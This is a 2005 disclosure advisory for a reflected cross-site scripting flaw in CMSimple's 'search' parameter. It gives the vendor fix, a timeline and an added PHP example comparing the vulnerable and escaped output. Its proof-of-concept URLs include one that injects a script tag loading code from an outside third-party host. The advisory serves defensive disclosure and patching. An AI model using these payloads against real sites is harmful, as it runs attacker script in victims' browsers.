CMSimple 'search' variable XSS

Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor URL: http://www.cmsimple.dk/
Advisory: http://lostmon.blogspot.com/2005/07/cmsimple-search-variable-xss.html
Vendor fix: http://www.cmsimple.dk/forum/viewtopic.php?t=2470
Vendor confirmed: YES   Exploit available: yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
SecurityTracker: 1014556
##############################################



CMSimple is a simple content management system for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!


CMSimple contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate the
'search' variable upon submission to the 'index.php' script. This could
allow a user to create a specially crafted URL that would execute
arbitrary script code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

The index.php file contains only an include of the cmsimple/cms.php file.


#############
VERSIONS
#############

CMSimple 2.4 and earlier versions


#############
Solution
#############

vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470

Fix:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;

should be replaced with:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));

This will be fixed in the next beta.
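To make the fix concrete, here is an added PHP example (not CMSimple's own code) that rebuilds the print-link fragment with hypothetical stand-in helpers and runs the advisory's payload shape through the vulnerable concatenation, the vendor's htmlspecialchars(stripslashes()) fix, and a stricter variant that URL-encodes the query value first. The ENT_QUOTES flag and rawurlencode() are this example's additions, not part of the vendor patch.

```php
<?php
// Added example, not CMSimple's code. amp() and the print_link_* functions
// are hypothetical stand-ins for the advisory's printlink() fragment.

function amp(): string { return '&amp;'; }

// Vulnerable pattern: the raw request value is concatenated into the
// href of the print link, so a value starting with "> leaves the attribute.
function print_link_vulnerable(string $search): string {
    $t = amp() . 'print' . amp() . 'function=search' . amp() . 'search=' . $search;
    return '<a href="?' . $t . '">Print</a>';
}

// Vendor-style fix from the advisory: HTML-escape the value for the
// attribute context. stripslashes() only matters under magic_quotes_gpc.
// ENT_QUOTES is added here so single-quoted attributes are covered too.
function print_link_vendor_fix(string $search): string {
    $t = amp() . 'print' . amp() . 'function=search' . amp() . 'search='
       . htmlspecialchars(stripslashes($search), ENT_QUOTES);
    return '<a href="?' . $t . '">Print</a>';
}

// Stricter variant: the value lives inside a URL query string, so encode
// it as a query component first, then HTML-escape for the attribute.
function print_link_hardened(string $search): string {
    $t = amp() . 'print' . amp() . 'function=search' . amp() . 'search='
       . htmlspecialchars(rawurlencode($search), ENT_QUOTES);
    return '<a href="?' . $t . '">Print</a>';
}

// Constructed input in the shape of the advisory's proof of concept.
$payload = '"><script src="http://example.invalid/js.js"></script>';

foreach (['vulnerable' => print_link_vulnerable($payload),
          'vendor fix' => print_link_vendor_fix($payload),
          'hardened'   => print_link_hardened($payload)] as $label => $html) {
    // A literal '<script' in the output means the attribute was broken out of.
    $status = (stripos($html, '<script') !== false) ? 'INJECTED' : 'safe';
    printf("%-10s %-8s %s\n", $label, $status, $html);
}
```

Only the first line reports INJECTED; the two escaped variants keep the payload inside the href value.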

#############
Timeline
#############

Discovered: 13-07-2005
Vendor notify: 20-07-2005
Vendor response: 21-07-2005
Vendor fix: 21-07-2005
Disclosure: 21-07-2005


################
Proof of concept
################

http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>



http://[victim]/?function=search&search=[XSS-CODE]

http://[victim]/?&print&function=search&search=[XSS-CODE]

http://[victim]/?License&function=search&search=[XSS-CODE]

http://[victim]/?Resellers&function=search&search=[XSS-CODE]

http://[victim]/?&guestbook&function=search&search=[XSS-CODE]


###################### €nd #########################

Thnx to Estrella for being my light
thnx to http://www.drorshalev.com/ for hosting the 'js.js' script
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....